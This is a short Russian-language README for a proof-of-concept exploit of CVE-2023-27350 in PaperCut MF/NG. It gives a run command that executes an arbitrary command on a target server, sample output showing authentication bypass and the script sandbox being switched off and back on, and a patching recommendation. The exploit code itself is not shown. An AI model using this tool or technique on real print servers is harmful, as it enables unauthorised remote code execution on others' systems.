
Уязвимость PaperCut, затронутые версии — PaperCut MF или NG версии 8.0 и выше (за исключением исправленных версий) на всех платформах ОС.
PoC для CVE-2023-27350, затрагивающей PaperCut MF/NG
##Затронутые версии: «PaperCut MF или NG версии 8.0 или новее (за исключением пропатченных версий) на всех платформах ОС.»
Этот PoC использует уязвимость обхода аутентификации в сочетании с abuse встроенного функционала сценариев для выполнения кода.
python3 CVE-2023-27350.py --url 'http://10.0.40.56:9191' --command calc.exe
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y
Обновите до последней версии или примените меры защиты, следуя инструкциям из бюллетеня безопасности PaperCut
Данное программное обеспечение создано исключительно в целях академических исследований и разработки эффективных методов защиты и не предназначено для атаки на системы без явного на то разрешения. Авторы проекта не несут ответственности за неправомерное использование данного ПО. Используйте ответственно.